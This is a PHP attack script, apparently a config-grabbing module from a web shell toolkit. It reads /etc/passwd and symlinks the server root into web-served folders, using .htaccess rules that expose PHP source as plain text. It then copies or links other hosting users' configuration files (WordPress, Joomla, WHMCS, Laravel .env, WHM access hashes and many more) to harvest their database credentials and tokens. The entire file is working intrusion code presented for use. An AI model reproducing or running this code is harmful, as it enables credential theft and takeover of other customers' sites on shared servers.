<?php
if ($_POST) {
       if ($_POST['config'] == 'symvhosts') {
        @mkdir("symvhosts", 0777);
        exe("ln -s / symvhosts/root");
        $htaccess = "Options Indexes FollowSymLinks
DirectoryIndex shiz.htm
AddType text/plain .php 
AddHandler text/plain .php
Satisfy Any";
        @file_put_contents("symvhosts/.htaccess", $htaccess);
        $etc_passwd = $_POST['passwd'];
        $etc_passwd = explode("
", $etc_passwd);
        foreach ($etc_passwd as $passwd) {
            $pawd = explode(":", $passwd);
            $user = $pawd[5];
            $jembod = preg_replace('//var/www/vhosts//', '', $user);
            if (preg_match('/vhosts/i', $user)) {
                exe("ln -s " . $user . "/httpdocs/wp-config.php symvhosts/" . $jembod . "-Wordpress.txt");
                exe("ln -s " . $user . "/httpdocs/configuration.php symvhosts/" . $jembod . "-Joomla.txt");
                exe("ln -s " . $user . "/httpdocs/config/koneksi.php symvhosts/" . $jembod . "-Lokomedia.txt");
                exe("ln -s " . $user . "/httpdocs/forum/config.php symvhosts/" . $jembod . "-phpBB.txt");
                exe("ln -s " . $user . "/httpdocs/sites/default/settings.php symvhosts/" . $jembod . "-Drupal.txt");
                exe("ln -s " . $user . "/httpdocs/config/settings.inc.php symvhosts/" . $jembod . "-PrestaShop.txt");
                exe("ln -s " . $user . "/httpdocs/app/etc/local.xml symvhosts/" . $jembod . "-Magento.txt");
                exe("ln -s " . $user . "/httpdocs/admin/config.php symvhosts/" . $jembod . "-OpenCart.txt");
                exe("ln -s " . $user . "/httpdocs/application/config/database.php symvhosts/" . $jembod . "-CodeIgniter.txt");
            }
        }
    }
    if ($_POST['config'] == 'symlink') {
        @mkdir("symconfig", 0777);
        @symlink("/", "symconfig/root");
        $htaccess = "Options Indexes FollowSymLinks
DirectoryIndex shiz.htm
AddType text/plain .php 
AddHandler text/plain .php
Satisfy Any";
        @file_put_contents("symconfig/.htaccess", $htaccess);
    }
    if ($_POST['config'] == '404') {
        @mkdir("sym404", 0777);
        @symlink("/", "sym404/root");
        $htaccess = "Options Indexes FollowSymLinks
DirectoryIndex shiz.htm
AddType text/plain .php 
AddHandler text/plain .php
Satisfy Any
IndexOptions +Charset=UTF-8 +FancyIndexing +IgnoreCase +FoldersFirst +XHTML +HTMLTable +SuppressRules +SuppressDescription +NameWidth=*
IndexIgnore *.txt404
RewriteEngine On
RewriteCond %{REQUEST_FILENAME} ^.*sym404 [NC]
RewriteRule .txt$ %{REQUEST_URI}404 [L,R=302.NC]";
        @file_put_contents("sym404/.htaccess", $htaccess);
    }
    if ($_POST['config'] == 'grab') {
        mkdir("shizuo_config", 0777);
        $isi_htc = "Options all
Require None
Satisfy Any";
        $htc = fopen("shizuo_config/.htaccess", "w");
        fwrite($htc, $isi_htc);
    }
    $passwd = $_POST['passwd'];
    preg_match_all('/(.*?):x:/', $passwd, $user_config);
    foreach ($user_config[1] as $user_shiz) {
        $grab_config = array("/home/$user_shiz/.accesshash" => "WHM-accesshash", "/home/$user_shiz/.env" => "Laravel", "/home/$user_shiz/laravel/.env" => "Laravel", "/home/$user_shiz/public_html/config/koneksi.php" => "Lokomedia", "/home/$user_shiz/public_html/forum/config.php" => "phpBB", "/home/$user_shiz/public_html/sites/default/settings.php" => "Drupal", "/home/$user_shiz/public_html/config/settings.inc.php" => "PrestaShop", "/home/$user_shiz/public_html/app/etc/local.xml" => "Magento", "/home/$user_shiz/public_html/admin/config.php" => "OpenCart", "/home/$user_shiz/public_html/application/config/database.php" => "CodeIgniter", "/home/$user_shiz/public_html/vb/includes/config.php" => "Vbulletin", "/home/$user_shiz/public_html/includes/config.php" => "Vbulletin", "/home/$user_shiz/public_html/forum/includes/config.php" => "Vbulletin", "/home/$user_shiz/public_html/forums/includes/config.php" => "Vbulletin", "/home/$user_shiz/public_html/cc/includes/config.php" => "Vbulletin", "/home/$user_shiz/public_html/inc/config.php" => "MyBB", "/home/$user_shiz/public_html/includes/configure.php" => "OsCommerce", "/home/$user_shiz/public_html/shop/includes/configure.php" => "OsCommerce", "/home/$user_shiz/public_html/os/includes/configure.php" => "OsCommerce", "/home/$user_shiz/public_html/oscom/includes/configure.php" => "OsCommerce", "/home/$user_shiz/public_html/products/includes/configure.php" => "OsCommerce", "/home/$user_shiz/public_html/cart/includes/configure.php" => "OsCommerce", "/home/$user_shiz/public_html/inc/conf_global.php" => "IPB", "/home/$user_shiz/public_html/wp-config.php" => "Wordpress", "/home/$user_shiz/public_html/wp/test/wp-config.php" => "Wordpress", "/home/$user_shiz/public_html/blog/wp-config.php" => "Wordpress", "/home/$user_shiz/public_html/beta/wp-config.php" => "Wordpress", "/home/$user_shiz/public_html/portal/wp-config.php" => "Wordpress", "/home/$user_shiz/public_html/site/wp-config.php" => "Wordpress", "/home/$user_shiz/public_html/wp/wp-config.php" => "Wordpress", "/home/$user_shiz/public_html/WP/wp-config.php" => "Wordpress", "/home/$user_shiz/public_html/news/wp-config.php" => "Wordpress", "/home/$user_shiz/public_html/wordpress/wp-config.php" => "Wordpress", "/home/$user_shiz/public_html/test/wp-config.php" => "Wordpress", "/home/$user_shiz/public_html/demo/wp-config.php" => "Wordpress", "/home/$user_shiz/public_html/home/wp-config.php" => "Wordpress", "/home/$user_shiz/public_html/v1/wp-config.php" => "Wordpress", "/home/$user_shiz/public_html/v2/wp-config.php" => "Wordpress", "/home/$user_shiz/public_html/press/wp-config.php" => "Wordpress", "/home/$user_shiz/public_html/new/wp-config.php" => "Wordpress", "/home/$user_shiz/public_html/blogs/wp-config.php" => "Wordpress", "/home/$user_shiz/public_html/configuration.php" => "Joomla", "/home/$user_shiz/public_html/blog/configuration.php" => "Joomla", "/home/$user_shiz/public_html/configuration.php" => "^WHMCS", "/home/$user_shiz/public_html/cms/configuration.php" => "Joomla", "/home/$user_shiz/public_html/beta/configuration.php" => "Joomla", "/home/$user_shiz/public_html/portal/configuration.php" => "Joomla", "/home/$user_shiz/public_html/site/configuration.php" => "Joomla", "/home/$user_shiz/public_html/main/configuration.php" => "Joomla", "/home/$user_shiz/public_html/home/configuration.php" => "Joomla", "/home/$user_shiz/public_html/demo/configuration.php" => "Joomla", "/home/$user_shiz/public_html/test/configuration.php" => "Joomla", "/home/$user_shiz/public_html/v1/configuration.php" => "Joomla", "/home/$user_shiz/public_html/v2/configuration.php" => "Joomla", "/home/$user_shiz/public_html/joomla/configuration.php" => "Joomla", "/home/$user_shiz/public_html/new/configuration.php" => "Joomla", "/home/$user_shiz/public_html/WHMCS/configuration.php" => "WHMCS", "/home/$user_shiz/public_html/whmcs1/configuration.php" => "WHMCS", "/home/$user_shiz/public_html/Whmcs/configuration.php" => "WHMCS", "/home/$user_shiz/public_html/whmcs/configuration.php" => "WHMCS", "/home/$user_shiz/public_html/whmcs/configuration.php" => "WHMCS", "/home/$user_shiz/public_html/WHMC/configuration.php" => "WHMCS", "/home/$user_shiz/public_html/Whmc/configuration.php" => "WHMCS", "/home/$user_shiz/public_html/whmc/configuration.php" => "WHMCS", "/home/$user_shiz/public_html/WHM/configuration.php" => "WHMCS", "/home/$user_shiz/public_html/Whm/configuration.php" => "WHMCS", "/home/$user_shiz/public_html/whm/configuration.php" => "WHMCS", "/home/$user_shiz/public_html/HOST/configuration.php" => "WHMCS", "/home/$user_shiz/public_html/Host/configuration.php" => "WHMCS", "/home/$user_shiz/public_html/host/configuration.php" => "WHMCS", "/home/$user_shiz/public_html/SUPPORTES/configuration.php" => "WHMCS", "/home/$user_shiz/public_html/Supportes/configuration.php" => "WHMCS", "/home/$user_shiz/public_html/supportes/configuration.php" => "WHMCS", "/home/$user_shiz/public_html/domains/configuration.php" => "WHMCS", "/home/$user_shiz/public_html/domain/configuration.php" => "WHMCS", "/home/$user_shiz/public_html/Hosting/configuration.php" => "WHMCS", "/home/$user_shiz/public_html/HOSTING/configuration.php" => "WHMCS", "/home/$user_shiz/public_html/hosting/configuration.php" => "WHMCS", "/home/$user_shiz/public_html/CART/configuration.php" => "WHMCS", "/home/$user_shiz/public_html/Cart/configuration.php" => "WHMCS", "/home/$user_shiz/public_html/cart/configuration.php" => "WHMCS", "/home/$user_shiz/public_html/ORDER/configuration.php" => "WHMCS", "/home/$user_shiz/public_html/Order/configuration.php" => "WHMCS", "/home/$user_shiz/public_html/order/configuration.php" => "WHMCS", "/home/$user_shiz/public_html/CLIENT/configuration.php" => "WHMCS", "/home/$user_shiz/public_html/Client/configuration.php" => "WHMCS", "/home/$user_shiz/public_html/client/configuration.php" => "WHMCS", "/home/$user_shiz/public_html/CLIENTAREA/configuration.php" => "WHMCS", "/home/$user_shiz/public_html/Clientarea/configuration.php" => "WHMCS", "/home/$user_shiz/public_html/clientarea/configuration.php" => "WHMCS", "/home/$user_shiz/public_html/SUPPORT/configuration.php" => "WHMCS", "/home/$user_shiz/public_html/Support/configuration.php" => "WHMCS", "/home/$user_shiz/public_html/support/configuration.php" => "WHMCS", "/home/$user_shiz/public_html/BILLING/configuration.php" => "WHMCS", "/home/$user_shiz/public_html/Billing/configuration.php" => "WHMCS", "/home/$user_shiz/public_html/billing/configuration.php" => "WHMCS", "/home/$user_shiz/public_html/BUY/configuration.php" => "WHMCS", "/home/$user_shiz/public_html/Buy/configuration.php" => "WHMCS", "/home/$user_shiz/public_html/buy/configuration.php" => "WHMCS", "/home/$user_shiz/public_html/MANAGE/configuration.php" => "WHMCS", "/home/$user_shiz/public_html/Manage/configuration.php" => "WHMCS", "/home/$user_shiz/public_html/manage/configuration.php" => "WHMCS", "/home/$user_shiz/public_html/CLIENTSUPPORT/configuration.php" => "WHMCS", "/home/$user_shiz/public_html/ClientSupport/configuration.php" => "WHMCS", "/home/$user_shiz/public_html/Clientsupport/configuration.php" => "WHMCS", "/home/$user_shiz/public_html/clientsupport/configuration.php" => "WHMCS", "/home/$user_shiz/public_html/CHECKOUT/configuration.php" => "WHMCS", "/home/$user_shiz/public_html/Checkout/configuration.php" => "WHMCS", "/home/$user_shiz/public_html/checkout/configuration.php" => "WHMCS", "/home/$user_shiz/public_html/BILLINGS/configuration.php" => "WHMCS", "/home/$user_shiz/public_html/Billings/configuration.php" => "WHMCS", "/home/$user_shiz/public_html/billings/configuration.php" => "WHMCS", "/home/$user_shiz/public_html/BASKET/configuration.php" => "WHMCS", "/home/$user_shiz/public_html/Basket/configuration.php" => "WHMCS", "/home/$user_shiz/public_html/basket/configuration.php" => "WHMCS", "/home/$user_shiz/public_html/SECURE/configuration.php" => "WHMCS", "/home/$user_shiz/public_html/Secure/configuration.php" => "WHMCS", "/home/$user_shiz/public_html/secure/configuration.php" => "WHMCS", "/home/$user_shiz/public_html/SALES/configuration.php" => "WHMCS", "/home/$user_shiz/public_html/Sales/configuration.php" => "WHMCS", "/home/$user_shiz/public_html/sales/configuration.php" => "WHMCS", "/home/$user_shiz/public_html/BILL/configuration.php" => "WHMCS", "/home/$user_shiz/public_html/Bill/configuration.php" => "WHMCS", "/home/$user_shiz/public_html/bill/configuration.php" => "WHMCS", "/home/$user_shiz/public_html/PURCHASE/configuration.php" => "WHMCS", "/home/$user_shiz/public_html/Purchase/configuration.php" => "WHMCS", "/home/$user_shiz/public_html/purchase/configuration.php" => "WHMCS", "/home/$user_shiz/public_html/ACCOUNT/configuration.php" => "WHMCS", "/home/$user_shiz/public_html/Account/configuration.php" => "WHMCS", "/home/$user_shiz/public_html/account/configuration.php" => "WHMCS", "/home/$user_shiz/public_html/USER/configuration.php" => "WHMCS", "/home/$user_shiz/public_html/User/configuration.php" => "WHMCS", "/home/$user_shiz/public_html/user/configuration.php" => "WHMCS", "/home/$user_shiz/public_html/CLIENTS/configuration.php" => "WHMCS", "/home/$user_shiz/public_html/Clients/configuration.php" => "WHMCS", "/home/$user_shiz/public_html/clients/configuration.php" => "WHMCS", "/home/$user_shiz/public_html/BILLINGS/configuration.php" => "WHMCS", "/home/$user_shiz/public_html/Billings/configuration.php" => "WHMCS", "/home/$user_shiz/public_html/billings/configuration.php" => "WHMCS", "/home/$user_shiz/public_html/MY/configuration.php" => "WHMCS", "/home/$user_shiz/public_html/My/configuration.php" => "WHMCS", "/home/$user_shiz/public_html/my/configuration.php" => "WHMCS", "/home/$user_shiz/public_html/secure/whm/configuration.php" => "WHMCS", "/home/$user_shiz/public_html/secure/whmcs/configuration.php" => "WHMCS", "/home/$user_shiz/public_html/panel/configuration.php" => "WHMCS", "/home/$user_shiz/public_html/clientes/configuration.php" => "WHMCS", "/home/$user_shiz/public_html/cliente/configuration.php" => "WHMCS", "/home/$user_shiz/public_html/support/order/configuration.php" => "WHMCS", "/home/$user_shiz/public_html/bb-config.php" => "BoxBilling", "/home/$user_shiz/public_html/boxbilling/bb-config.php" => "BoxBilling", "/home/$user_shiz/public_html/box/bb-config.php" => "BoxBilling", "/home/$user_shiz/public_html/host/bb-config.php" => "BoxBilling", "/home/$user_shiz/public_html/Host/bb-config.php" => "BoxBilling", "/home/$user_shiz/public_html/supportes/bb-config.php" => "BoxBilling", "/home/$user_shiz/public_html/support/bb-config.php" => "BoxBilling", "/home/$user_shiz/public_html/hosting/bb-config.php" => "BoxBilling", "/home/$user_shiz/public_html/cart/bb-config.php" => "BoxBilling", "/home/$user_shiz/public_html/order/bb-config.php" => "BoxBilling", "/home/$user_shiz/public_html/client/bb-config.php" => "BoxBilling", "/home/$user_shiz/public_html/clients/bb-config.php" => "BoxBilling", "/home/$user_shiz/public_html/cliente/bb-config.php" => "BoxBilling", "/home/$user_shiz/public_html/clientes/bb-config.php" => "BoxBilling", "/home/$user_shiz/public_html/billing/bb-config.php" => "BoxBilling", "/home/$user_shiz/public_html/billings/bb-config.php" => "BoxBilling", "/home/$user_shiz/public_html/my/bb-config.php" => "BoxBilling", "/home/$user_shiz/public_html/secure/bb-config.php" => "BoxBilling", "/home/$user_shiz/public_html/support/order/bb-config.php" => "BoxBilling", "/home/$user_shiz/public_html/includes/dist-configure.php" => "Zencart", "/home/$user_shiz/public_html/zencart/includes/dist-configure.php" => "Zencart", "/home/$user_shiz/public_html/products/includes/dist-configure.php" => "Zencart", "/home/$user_shiz/public_html/cart/includes/dist-configure.php" => "Zencart", "/home/$user_shiz/public_html/shop/includes/dist-configure.php" => "Zencart", "/home/$user_shiz/public_html/includes/iso4217.php" => "Hostbills", "/home/$user_shiz/public_html/hostbills/includes/iso4217.php" => "Hostbills", "/home/$user_shiz/public_html/host/includes/iso4217.php" => "Hostbills", "/home/$user_shiz/public_html/Host/includes/iso4217.php" => "Hostbills", "/home/$user_shiz/public_html/supportes/includes/iso4217.php" => "Hostbills", "/home/$user_shiz/public_html/support/includes/iso4217.php" => "Hostbills", "/home/$user_shiz/public_html/hosting/includes/iso4217.php" => "Hostbills", "/home/$user_shiz/public_html/cart/includes/iso4217.php" => "Hostbills", "/home/$user_shiz/public_html/order/includes/iso4217.php" => "Hostbills", "/home/$user_shiz/public_html/client/includes/iso4217.php" => "Hostbills", "/home/$user_shiz/public_html/clients/includes/iso4217.php" => "Hostbills", "/home/$user_shiz/public_html/cliente/includes/iso4217.php" => "Hostbills", "/home/$user_shiz/public_html/clientes/includes/iso4217.php" => "Hostbills", "/home/$user_shiz/public_html/billing/includes/iso4217.php" => "Hostbills", "/home/$user_shiz/public_html/billings/includes/iso4217.php" => "Hostbills", "/home/$user_shiz/public_html/my/includes/iso4217.php" => "Hostbills", "/home/$user_shiz/public_html/secure/includes/iso4217.php" => "Hostbills", "/home/$user_shiz/public_html/support/order/includes/iso4217.php" => "Hostbills");
        foreach ($grab_config as $config => $nama_config) {
            if ($_POST['config'] == 'grab') {
                $ambil_config = file_get_contents($config);
                if ($ambil_config == '') {
                } else {
                    $file_config = fopen("configgrab/$user_shiz-$nama_config.txt", "w");
                    fputs($file_config, $ambil_config);
                }
            }
            if ($_POST['config'] == 'symlink') {
                @symlink($config, "Symconfig/" . $user_shiz . "-" . $nama_config . ".txt");
            }
            if ($_POST['config'] == '404') {
                $sym404 = symlink($config, "sym404/" . $user_shiz . "-" . $nama_config . ".txt");
                if ($sym404) {
                    @mkdir("sym404/" . $user_shiz . "-" . $nama_config . ".txt404", 0777);
                    $htaccess = "Options Indexes FollowSymLinks
DirectoryIndex shiz.htm
HeaderName shiz.txt
Satisfy Any
IndexOptions IgnoreCase FancyIndexing FoldersFirst NameWidth=* DescriptionWidth=* SuppressHTMLPreamble
IndexIgnore *";
                    @file_put_contents("sym404/" . $user_shiz . "-" . $nama_config . ".txt404/.htaccess", $htaccess);
                    @symlink($config, "sym404/" . $user_shiz . "-" . $nama_config . ".txt404/shiz.txt");
                }
            }
        }
    }
    if ($_POST['config'] == 'grab') {
        echo '<center><br><br><a href="configgrab/" target="_blank"><font color=lime>Done</font></a></center>';
    }
    if ($_POST['config'] == '404') {
        echo '<center><br><br>
<a href="sym404/root/" target="_blank">Root</a>
<br><br><a href="sym404/" target="_blank">Configurations</a></center>';
    }
    if ($_POST['config'] == 'symlink') {
        echo '<center><br><br>
<a href="symconfig/root/" target="_blank">Root</a>
<br><br><a href="symconfig/" target="_blank">Configurations</a></center>';
    }
    if ($_POST['config'] == 'symvhost') {
        echo '<center><br><br>
<a href="symvhost/root/" target="_blank">Root Server</a>
<br><br><a href="symvhost/" target="_blank">Configurations</a></center>';
    	}
    } else {
       echo '<form method="post" action=""><textarea class="bigarea" name="passwd" rows="20" cols="100">
';
if(is_readable('/etc/passwd')) {
  readfile("/etc/passwd") or include ("/etc/passwd") or die("Unable to open file!");
} else {
  echo ("Unable to open file!");
}
    echo '</textarea></br>
        <select name="config">
		<option value="404">Config 404</option>
        <option value="grab">Config Grab</option>
        <option value="symlink">Symlink Config</option>
		<option value="symvhosts">Vhosts Config Grabber</option></select><input type="submit" value="Submit!!"> </form></center>
';
    }
?>
